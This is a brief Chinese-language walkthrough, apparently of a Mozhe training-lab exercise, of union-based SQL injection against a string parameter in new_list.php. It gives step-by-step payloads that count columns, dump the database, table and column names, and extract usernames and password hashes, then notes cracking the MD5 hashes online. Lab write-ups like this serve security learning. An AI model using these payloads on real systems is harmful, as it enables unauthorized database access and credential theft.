字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了
id=tingjigonggao' order by 1 -- 测试 字段个数,发现有4个
试过盲猜表,admin,manger,失败
老老实实暴库,先测回显位置 id=tingjigongga' union select '1','2','3','4' --
/new_list.php?id=tingjigongga' union select '1',database(),'3','4' -- 爆库
id=tingjigongga' union select '1',(select group_concat(table_name) from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup' limit 0,1),'3','4' -- 爆表
id=tingjigonggao1' union select '1',(select group_concat(column_name) from information_schema.columns where table_name='stormgroup_member'),'3','4' -- 爆字段
id=tingjigonggao1' union select '1',(select group_concat(name,0x7c,password,0x7e) from stormgroup_member),'3','4' --
爆字段值
MD5在线解密即可